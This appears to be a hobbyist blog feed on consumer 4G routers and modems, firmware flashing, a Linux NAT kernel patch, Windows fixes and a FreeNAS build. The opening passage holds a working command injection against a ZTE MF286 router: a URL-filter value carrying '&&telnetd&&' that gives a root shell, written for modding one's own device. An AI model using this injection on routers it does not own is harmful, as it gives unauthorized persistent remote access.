<span style="font-family: "courier new" , "courier" , monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=CHANGE_MODE&change_mode=2&password=XXX"</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>We can still gain root shell on this device easily.</b></div>
<div>
<br /></div>
<div>
First we authenticate. Password is MIME encoded, here I use default password 1234.</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=LOGIN&password=MTIzNA%3D%3D"</span></div>
<div>
<br /></div>
<div>
Next we add new URL filter rule that exploits bug in nvram parser to also start telnetd. </div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=URL_FILTER_ADD&addURLFilter=http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26"</span></div>
<div>
<br /></div>
<div>
One can now simply telnet to port 4719 on 192.168.1.1 and login as "admin" with password "admin".</div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(none) login: admin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Password: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">BusyBox v1.15.0 (2016-10-25 20:15:21 CST) built-in shell (ash)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Enter 'help' for a list of built-in commands.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">~ # uname -a</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Linux (none) 2.6.31 #1 Tue Oct 25 20:15:00 CST 2016 mips GNU/Linux</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">~ # </span></div>
</div>
<div>
<br /></div>
<div>
This is persistent and will start telnetd on after next reboot unless this special URL is removed via web interface first. <b><u>CAUTION!</u></b> Telnet server listens also on WAN side. Meaning after activating it ANYONE can login to your router over Internet. So only do this with mobile broadband DISCONNECTED.</div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com8tag:blogger.com,1999:blog-6586814948089606304.post-73235415669735160872017-03-23T23:44:00.003+02:002017-03-23T23:44:36.717+02:00Locking custom LTE bands on ZTE MF286My ZTE MF286 is running DNA firmware version B04. It's somewhat limited in LTE band selection, but that can easily be worked around with curl.<div>
<a name='more'></a><div>
First of all authenticate to device using web browser. Otherwise these commands will return failure. You want to see <i>{"result":"success"}</i> message.</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 2100MHz (B1) / 1800MHz (B3) / 2600MHz (B7) / 800MHz (B20) / 700MHz (B28)</b> - this is default setting</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8080045"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 1800MHz (B3) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x04"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x40"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 700MHz (B28) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8000000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 1800MHz (B3) / 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x45"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) / 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80040"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) / 1800MHz (B3) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80004"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 700MHz (B28) / 800MHz (B20) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8080000"</span></div>
</div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com14tag:blogger.com,1999:blog-6586814948089606304.post-72193401237038094472017-03-23T15:26:00.003+02:002017-03-23T15:26:41.955+02:00Inside ZTE MF286 routerZTE MF286 4G router is built around Qualcomm QCA9563 soc with 802.11bgn, QCA9882 802.11ac wlan, QCA8337 gigabit switch and MDM9230 LTE chip. There's also tempting serial port knowing all components used are already supported by LEDE (that has replaced OpenWrt).<br />
<br />
Photos <a href="https://goo.gl/photos/B2UUUM9jz3jsbrtG8">here</a>.asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com2tag:blogger.com,1999:blog-6586814948089606304.post-34547442680925834632017-03-23T15:12:00.002+02:002017-03-23T15:12:59.036+02:00Inside Huawei B315s-22 4G routerHuawei B315s-22 contains Huawei HiSilicon 6361 SoC, Realteak Ethernet switch and Broadcom WLAN. Not much to see, but some photos <a href="https://goo.gl/photos/jH9Ad4hfS1WSnH5x5">here</a>.asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-55791779403611708232017-03-19T16:07:00.002+02:002017-03-19T16:07:59.264+02:00Linux SNAT with per-connection source address from IP poolWhen doing NAT with pool of addresses to choose from (instead of masquerading) Linux insists on always using same IP from pool for particular source IP. Often this is preferred, but not always. To workaround we need to patch kernel a bit.<br />
<br />
<a name='more'></a>Code to tamper with is located in net/netfilter/nf_nat_core.c which also has explanation for this behavior. There's some discussion about this on <a href="https://patchwork.ozlabs.org/patch/699934/">https://patchwork.ozlabs.org/patch/699934/</a> which also includes patch we need to fix this.<br />
<b><br /></b>
<b>Original nf_nat_core.c</b><br />
<span style="font-family: Courier New, Courier, monospace;"><b>283 </b>/* Hashing source and destination IPs gives a fairly even</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>284 </b>* spread in practice (if there are a small number of IPs</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>285 </b>* involved, there usually aren't that many connections</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>286 </b>* anyway). The consistency means that servers see the same</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>287 </b>* client coming from the same IP (some Internet Banking sites</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>288 </b>* like this), even across reboots.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>289 </b>*/</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>290 </b>j = jhash2((u32 *)&tuple->src.u3, sizeof(tuple->src.u3) / sizeof(u32),</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>291 </b>range->flags & NF_NAT_RANGE_PERSISTENT ?</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>292 </b>0 : (__force u32)tuple->dst.u3.all[max] ^ zone->id);</span><br />
<div>
<br /></div>
<div>
All we need to do is replace line 290 with this and remove lines 291 and 292.</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>290 </b>j = prandom_u32();</span></div>
<div>
<br /></div>
<div>
That's it. Now every new connection will get randomized IP from specified pool. My use case for this? Quite unique I guess. This was my first attempt to work around limitation of Linux IPSEC VTI interfaces not supporting more than one client connecting using same IP address. Situation which rather common with 4G LTE networks and CGNAT's masquerading thousands of users users behind single public IPv4 address.</div>
<div>
<br /></div>
<div>
Here's funky rules I came up with. First one redirect all incoming UDP traffic to Strongswan listening on port udp/4500. Second NATs connection to random IP address from 254.0.0.0/8 subnet. Yes, this is crazy. Yes, this actually works. Yes, it is useful. No, it's not supported by anyone and most certainly isn't how these components were intended to be used.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I PREROUTING -p udp -d 192.0.100.1 -j REDIRECT --to-port 4500</span></div>
</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I INPUT -p udp -d 192.0.100.1 -j SNAT --to-source 254.0.0.0-254.255.255.255</span></div>
</div>
<div>
<br /></div>
<div>
On client side my settings are at least as odd. I added following rule for outbound traffic. This performs DNAT on outbound Strongswan packets. Paired with rightikeport=4500 on ipsec.conf and port=0 + port_nat_t=0 on charon.conf connections over Internet use random UDP source port and random UDP destination port. Yet it's still standard IKEv2 NAT-T traffic to both client and server processes.<br /><div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I OUTPUT --dst 192.0.100.1 -p udp --dport 4500 -j DNAT --to-destination :1-65535 --random</span></div>
</div>
<div>
<br /></div>
<div>
Have fun. :)</div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-77372393576506693662016-12-17T17:27:00.000+02:002016-12-17T17:27:11.540+02:00Windows 10 audio playback fails over bluetoothQuick google search reveals hundreds of posts having exactly same problem - pairing with bluetooth audio device works but there's no audio. Hundreds of posts with incorrect instructions to fix problem. You do NOT need to uninstall random devices, restart service etc. All you need is correct Bluetooth drivers - drivers NOT available on Windows Update.<div>
<a name='more'></a>Your best bet is to grab drivers from manufacturer website. Don't waste your time in HP or Dell or Lenovo sites but go straight to the source - in my case for Dell DW380 it's Broadcom.</div>
<div>
<br /></div>
<div>
<a href="https://www.broadcom.com/support/bluetooth">https://www.broadcom.com/support/bluetooth</a> [ <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/broadcom_bluetooth">MIRROR</a> ]</div>
<div>
<br /></div>
<div>
Install drivers, reboot, pair bluetooth speaker, new windows pops up asking if audio should be connected and that's it.</div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-25088422697880682072016-10-09T22:54:00.003+03:002016-10-09T22:55:35.220+03:00Vectorworks 2016 SP4 crashes on startup with Intel HD graphicsVectorworks 2016 SP4 keeps crashing on startup with fault in module IG75ICD64.DLL when running on Lenovo W540p laptop with Nvidia Quadro 1100M. This laptop has also built-in Intel graphics and troublesome DLL is part of Intel driver package.<br />
<br />
<a name='more'></a>Upgrading to latest drivers from Nvidia and Intel websites didn't fix problem. Upgrading to latest Nvidia Optimus driver package from Lenovo and disabling Intel graphics solved problem at cost of battery life due Nvidia being always active.<br />
<br />
Get latest driver from here: <a href="http://support.lenovo.com/fi/en/downloads/ds037642">http://support.lenovo.com/fi/en/downloads/ds037642</a><br />
<br />
And follow instructions on this thread to turn off Intel graphics and always use Nvidia only: <a href="https://forums.lenovo.com/t5/ThinkPad-P-and-W-Series-Mobile/W540-Disabling-Optimus-in-BIOS-UEFI-gone/td-p/1463401">https://forums.lenovo.com/t5/ThinkPad-P-and-W-Series-Mobile/W540-Disabling-Optimus-in-BIOS-UEFI-gone/td-p/1463401</a><br />
<div>
<br /></div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-73995265617527846462016-10-04T19:44:00.001+03:002016-10-20T01:13:38.830+03:00Dell DW5560 and other Ericsson 3G WWAN modules with Windows 10There's Dell drivers for Windows 10 but they fail to install. Reason is that you first need to upgrade firmware of Ericsson 3G WWAN module.<br />
<br />
<a name='more'></a>- Download and install <a href="http://www.dell.com/support/home/fi/fi/fibsdt1/Drivers/DriversDetails?driverId=CNYGV">Communications_Driver_CNYGV_WN32_8.2.5.0_A00.EXE</a><br />
- You'll get error during install, just ignore it<br />
- Download and install <a href="http://www.dell.com/support/home/fi/fi/fibsdt1/Drivers/DriversDetails?driverId=M6PTD">M6PTD_A00_R4A10_Setup_ZPE.exe</a>, this will upgrade WWAN to R4D02<br />
- You'' get error from this one as well after firmware upgrade, just ignore it<br />
- Done, DW5560 is now visible under network devices in device manager and will show up just like WiFi after you insert valid SIM card<br />
<br />
You can now go to very latest firmware available by using <a href="http://support.lenovo.com/fi/en/downloads/ds039685">upgrade</a> from Lenovo. It works also for Dell branded units and upgrades them from R3C11/R4A10 to R3C11/R4D02.<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com2tag:blogger.com,1999:blog-6586814948089606304.post-68982641413862530782016-09-02T21:59:00.000+03:002017-12-28T16:39:38.437+02:00Convert Huawei E3372h-153 from HiLink/router-mode to Stick/modem-mode [ UPDATED 2016-09-02 ]<i>This is updated version of my original post. I purchased additional modem that's externally identical to old one but had different serial port USB ID (USB\VID_12D1&PID_1442&MI_00) missing from earlier driver pack causing original instructions to fail. I have also included latest Stick-mode firmware 21.200.07.00.805 I've found and corrected some incorrect information on original post.</i><br />
<br />
Modern Huawei USB LTE modems can be used in two very different modes. Default is HiLink mode where it functions as router doing NAT and other nastiness much like more traditional 4G routers connected over WLAN or Ethernet. Unsurprisingly default mode is HiLink, but luckily it can be changed to Stick mode getting rid at least one layer of NAT and related issues.<br />
<br />
Actually there's also third mode which is subset of Stick, instead of native NCM interface it uses legacy PPP over emulated serial port. This can be sometimes useful with older routers with USB port but you won't be able to reach full speed in this mode.<br />
<br />
Internet has plenty of information on how to do that. As it often is not all of that is true. Most interesting bits are also written in Russian. Despite huge improvements in translations from Google Translate it's still a bit of hit and miss.<br />
<br />
Following these instructions will also resolve Error Code 19 and "brick" with Error Code 13 (rapidly flashing green led). Which is also why some steps may seem bit pointless at first. Feel free to skip them and then start again from beginning when Mr Error #19 and Mrs. Error #13 bite you. :)<br />
<br />
<a name='more'></a><div>
You'll need Windows PC for this. I've used 64-bit Windows 7 and Windows 10 PCs myself.<br />
<br />
If you've tried this before coming to here I'm sure you've seen those "open http://192.168.8.1/html/switchProjectMode.html" instructions. Those are for older models like E3372s and won't work with E3372h.<br />
<br />
Hold tight!<br />
<br />
<ul>
<li>Visit either one of these sites to calculate device specific "Flash code" based on your IMEI and write it down. Depending on current firmware running on your device you may or may not need Flash code later. Better be safe and get one ready so you don't get stuck.</li>
<ul>
<li><a href="http://huaweiunlockcalculator.com/huawei-flash-code" rel="nofollow" target="_blank">Online calculator 1</a></li>
<li><a href="https://3ginfo.ru/custom/new_unlocker.php" rel="nofollow" target="_blank">Online calculator 2</a></li>
</ul>
<li>Download and extract <a href="https://dump.asiantuntijakaveri.fi/le_bueno_dumpo/Huawei_E3372h-153_HiLink-to-Stick2.zip">this ZIP</a> that contains required tools, drivers and firmware images</li>
<li>Install "[1] Mobile Broadband HL Service" by running mbbServiceSetup.exe</li>
<ul>
<li>Installs RNDIS driver</li>
<li>Installs service to switch from CD emulation to RNDIS (like usb-modeswitch on Linux)</li>
</ul>
<li>Install "[2] Datacard Driver" by running Driver_Upgrade.vbs</li>
<ul>
<li>Installs serial port drivers (including FcSerial needed by some devices)</li>
</ul>
<li>Insert E3372h-153 with HiLink firmware to USB port</li>
<ul>
<li>Preferrably directly to PC, avoid cheap chinese USB extension cables.</li>
<li>Open Device Manager and verify that RNDIS interface is present under Network adapters</li>
<li>Open command prompt and "PING 192.168.8.1" to make sure HiLink firmware is running</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
<ul>
<li>This will enable "PC UI" serial port required for firmware upgade</li>
<li>Wait until you can see it under Ports in Device Manager</li>
<li>"curl: (56) Recv failure: Connection was reset" error is expected and should be ignored</li>
</ul>
<li>Run "Update_WEBUI_17.100.06.00.03_Hilink_V7R2_9x25_CPIO.exe" from "[4] Huawei E3372h WebUI"</li>
<ul>
<li>This updates user interface but doesn't touch rest of the firmware.</li>
<li>If you have Error Code 13 this will fix it. Code 13 ("Authentication failed") is caused by failed attempt to flash firmware resulting in Error Code 19 ("Download failed").</li>
<li>See <a href="http://www.paoli.cz/out/media/HUAWEI_Module_Firmware_Upgrade_Guide_on_Windows_V100R001_01(5).pdf">HUAWEI_Module_Firmware_Upgrade_Guide_on_Windows_V100R001_01(5).pdf</a> for complete list of error codes.</li>
<li>Wait until WebUI update is complete and you can ping 192.168.8.1 again.</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
<li>Run "E3372h-153_Update_22.180.05.00.00.exe" from "[5] Huawei E3372h-153 HiLink FW" folder.</li>
<ul>
<li>This upgrades (or downgrades) your HiLink firmware version. You may need Flash code from one of those calculators to do this.</li>
<li>Wait until HiLink update is complete and you can ping 192.168.8.1 again.</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
<li>Run "E3372h-153Update_21.200.07.00.805_Universal.exe" from "[6] Huawei_E3372h-153 Stick FW" folder.</li>
<ul>
<li>This finally changes firmware from HiLink to Stick. You may need Flash code again.</li>
<li>Wait until Stick update is complete. You can no longer ping 192.168.8.1 and RNDIS adapter has changed to "HUAWEI Mobile Connect - Network Card".</li>
</ul>
<li>Run "putty.exe" from "[7] Putty" folder</li>
<ul>
<li>Find serial port name from Device Manager, for example in case of "HUAWEI Mobile Connect - PC UI Interface (COM15)" port name is COM15</li>
<li>Click Serial on right hand side of Putty screen and type COM15 or whatever your port is.</li>
<li>Click Open on botton of Putty</li>
<li>Type ' ATE1 ' without quotes, you won't see what you type and DO NOT try to use backspace. If you did it right you got ' OK ' as reply. Ignore ^RSSI etc. lines you might also see.</li>
<li>Type following commands one per line to see info about your device and verify connection works. </li>
<ul>
<li>' ATI '</li>
<li>' AT^FHVER '</li>
<li>' AT^VERSION? '</li>
</ul>
<li>Get current SETPORT value by typing ' AT^SETPORT? '. You might want to write these down if you ever want to revert back to defaults. Mine was ' ^SETPORT:A1,A2;12,1,16,A1,A2 '.</li>
<li>Set new SETPORT value by typing ' AT^SETPORT="FF;12,16" ', this is claimed to disable CD emulation and modeswitch requirement but actually it only disables unnecessary ports appearing after modeswitch. So you still need automated switch from CD emulation to WWAN with "Mobile Broadband HL Service" or "usb-modeswitch" in Linux.</li>
<li>If you want to keep PPP support for example for older router with USB port use ' AT^SETPORT="FF;12,10,16" ' instead. Remember that you won't get full speed with PPP.</li>
<li>Reset modem by typing ' AT^RESET '.</li>
<li>Close Putty now.</li>
</ul>
<li>Done. </li>
</ul>
<div>
<br /></div>
<div>
Your E3372h is now in stick mode, presents itself as NCM device that's compatible with Windows Mobile Broadband feature and also with huawei_cdc_ncm under Linux. You don't need 3rd party mobile tools on Windows. This means to connect Internet use built in features of your operating system, stay away from "Mobile Partner" etc. </div>
</div>
<div>
<br /></div>
<div>
If you prefer keeping HiLink why not root it? :) If you don't root it someone else probably will given Huawei track record on security... There's <a href="http://sh.com.hr/en/modificiranje-huawei-e3372-lte-sticka/">excellent writeup</a> and step-by-step instructions in English from Ivan. Modeswitch tools are also from him. </div>
<div>
<br /></div>
<div>
Rest of files were collected from links found on <a href="http://www.lteforum.at/">lteforum.at</a>, <a href="http://4pda.ru/forum/">4pda.ru</a> and <a href="https://3ginfo.ru/download75.html">3Ginfo.ru</a>.</div>
<div>
<br /></div>
<div>
P.S. You can get E3372h-153's from <a href="http://www.ebay.ie/sch/i.html?_from=R40&_sacat=0&_sop=15&_nkw=Huawei%20E3372H-153&LH_PrefLoc=3&rt=nc&LH_BIN=1&_trksid=p2045573.m1684">Ebay for 29€/each</a> including shipping from Latvia. Downside on these cheap ones is broken locking tabs on top cover. This is because they're LMT branded and were superglued shut with LMT SIM card inside.</div>
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com143tag:blogger.com,1999:blog-6586814948089606304.post-78968800878760053602016-08-23T13:34:00.001+03:002016-08-23T13:34:31.463+03:00Upgrading Huawei E367u-2 firmwareTrying to upgrade Huawei E367u-2 from old 11.810.09.00.00 to latest available <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/e367u-2/E367Update_11.838.01.00.1131.B726.exe">11.838.01.00.1131</a> ends up with error code 16. This one was easy to fix - flash first <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/e367u-2/E367Update_11.810.09.33.00.B726.exe">11.810.09.33.00</a> and then to latest.asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-18190244972845289042016-08-23T12:47:00.000+03:002016-08-23T12:47:15.913+03:00Upgrading Sierra Wireless 319U firmwareSierra Wireless 319U is fairly decent USB 3G dongle that supports up to 42Mbit/s DC-HSPA+. However it has nasty tendency to <a href="https://kb.juniper.net/InfoCenter/index?page=content&id=KB26433">randomly hang</a>.<br />
<br />
<a name='more'></a>Ever since Sierra sold thier USB dongle business to Netgear finding firmware updates has become difficult. It's been always difficult to be fair.<br />
<br />
Netgear website does not offer firmware upgrades to 319U, but they do have upgrade (N_2_0_8_1CAP) for Telus branded variant of 319U. This worked ok with my Sierra 319U that had older and buggy N_2_0_5AP firmware.<br />
<br />
Latest available appears to be <a href="http://www.downloads.netgear.com/files/aircard/TelstraAC312U-N2_0_8_6bt-N2_0_8_6ap.exe">N_2_0_8_6AP</a> which is also what Juniper recommends on their KB article linked above. Since Sierra 312U and 319U are same device (apart from different formfactor) I simply downloaded upgrade for Telstra branded 312U and flashed it to generic Sierra 319U.<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-79015330145767790502016-08-08T12:18:00.000+03:002016-08-08T12:18:48.528+03:00Win10 Windows Update stuck at 0% downloading updates<div class="tr_bq">
All the hype with Windows 10 and still something as elementary as Windows Update keeps getting corrupted. Common failure appears to be it properly detecting required updates but then getting stuck at 0% when downloading them.</div>
<a name='more'></a>Microsoft has <a href="http://go.microsoft.com/?linkid=9830262">troubleshooting tool</a> but that was only able to tell me WU is broken rather than fix it as claimed. Not even re-installing entire Windows over existing install would help. Clean install would've of course solved it but I was not interested in setting up everything again to my likings.<br />
<br />
So let's do it manually. Stop all affected services.<br />
<br />
<b>net /y stop wuauserv</b><br />
<b>net /y stop cryptsvc</b><br />
<b>net /y stop bits</b><br />
<b>net /y stop msiserver</b><br />
<br />
Now you'll probably end up with unstoppable wuauserv service. Even when you do manage to kill it it'll autostart preventing removal of corrupted softwaredistribution folder. Here's how to work around this.<br />
<br />
<b>net /y stop wuauserv & taskkill /F /FI "SERVICES eq wuauserv" & ren c:\windows\softwaredistribution softwaredistribution.bad & ren c:\windows\system32\catroot2 catroot2.bad</b><br />
<br />
And restart them.<br />
<br />
<b>net start wuauserv</b><br />
<b>net start cryptsvc</b><br />
<b>net start bits</b><br />
<b>net start msiserver</b><br />
<br />
<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-76160796170705952322016-02-23T10:08:00.000+02:002016-02-23T10:08:06.840+02:00Silently and unattended install / upgrade Windows driversUpgrading Windows drivers tends to be troublesome and time consuming process. Here's little trick to make it easier.<br />
<br />
<a name='more'></a>Start by downloading suitable "SCCM" driver package from manufacturers site.<br />
<br />
HP: <a href="http://ftp.hp.com/pub/caps-softpaq/cmit/HP_Driverpack_Matrix_x64.html">http://ftp.hp.com/pub/caps-softpaq/cmit/HP_Driverpack_Matrix_x64.html</a><br />
Dell: <a href="http://en.community.dell.com/techcenter/enterprise-client/w/wiki/2065.dell-command-deploy-driver-packs-for-enterprise-client-os-deployment">http://en.community.dell.com/techcenter/enterprise-client/w/wiki/2065.dell-command-deploy-driver-packs-for-enterprise-client-os-deployment</a><br />
Lenovo: <a href="https://support.lenovo.com/fi/fi/documents/ht074984">https://support.lenovo.com/fi/fi/documents/ht074984</a><br />
<br />
Unpack driver pack and <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/Driver_Upgrade.zip">this zip file</a> to same folder. Linked zip contains dpinst with minimal config file and vbs to launch it with elevated rights and correct command line parameters. So run "Driver_Upgrade.vbs" and wait few minutes. Reboot. Done.<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-30447919797928824872015-12-17T15:30:00.002+02:002015-12-17T15:30:20.152+02:00Low budget fanless ZFS NASDunno how this will end up as I did again mistake of digging up one of those Wyse Z90D7 terminals from junk pile. This time my idea is to use it for NAS after upgrading RAM from 2GB to 6GB and adding two 1TB 2.5" USB3 disks. Wyse being fanless and with host powered disks this should be decent combo.<br />
<br />
Then add FreeNAS 9.2 and ZFS with snapshots. Snapshots are mandatory feature as I'm sending this to friend of mine for christmas present. He's one of those who insist on installing every virus and cryptolocker he can find. With data backed up to NAS and protected by daily snapshots recovery is much easier than ever before. With assumption that he'll save important data to network drive which will then probably corrupt it all due me using inappropriate hardware...<br />
<br />
<a name='more'></a>Design "parameters"<br />
<div>
<div>
- RAID-Z1 mirror of two USB3 disks.</div>
<div>
- Three datasets: datat, scratch and spycam.</div>
<div>
- Snapshots once per day for datat and scratch.</div>
<div>
- Keep snapshots shorter time for scratch dataset.</div>
<div>
- No performance needs since clients connect over 54Mbit/s multihop WLAN mesh.</div>
<div>
- All users granted global read/write to all data.</div>
<div>
- No need to access from Internet.</div>
<div>
- No plugins or jail services on FreeNAS.</div>
<div>
- Ability to upload images using FTP (from WIFI IP cameras).</div>
<div>
- No maintenance. Set it and forget it - at least until both disks fail.</div>
<div>
<br />
<div>
Let's start by adding some RAM to Wyse. First I took 2GB module from another identical Wyse so no compatibility issues but 4GB is bit too much lower than FreeNAS 8GB requirement so I kept one of Wyse DIMMs and added one Kingston "KTD-XPS730B/4G 1.5V" for total of 6GB. I'm using PC3-10600U RAM and BIOS shows 1333MHz bus speed.<br />
<br />
With 6GB RAM and 4GB internal SSD we're still way below FreeNAS minimum hardware requirements which as 8GB RAM and 8GB storage. I think with just two 1TB disks and having only Samba and FTP services running 6GB will be more than enough.<br />
<br />
<a href="http://download.freenas.org/9.2.1.9/RELEASE/x64/">Download</a> latest FreeNAS 9.2 build, I used FreeNAS-9.2.1.9-RELEASE-x64.<u><b>usb</b></u> myself. Really shame we're stuck with 9.2 instead of latest 9.3. That's due 9.2 being last version that can boot on any standard PC. Starting with 9.3 developers decided to switch to GPT (to be able to boot from ZFS) causing many PCs no longer being able to run FreeNAS. Unsurprisingly Z90D7 is among those no longer compatible which combined with fact that 9.2 has less than perfect USB3 support is bit worrying. If you're using Windows use <a href="https://rufus.akeo.ie/downloads/">Rufus</a> to create bootable USB install media.<br />
<br />
If you haven't done so already upgrade to recent BIOS following my earlier <a href="http://blog.asiantuntijakaveri.fi/2015/07/updating-wyse-z90d7-windows-terminal.html">instructions</a>. Connect FreeNAS install USB stick to Wyse but DO NOT connect USB3 disks yet. Go tio BIOS setup and enable USB boot so we can boot from FreeNAS install media. Set boot order so everything is disabled (press "!") except SATA0 and FreeNAS install media. SATA0 should be first on boot order list. Save changes and hit "P" on startup to access boot menu and boot from USB.<br />
<br />
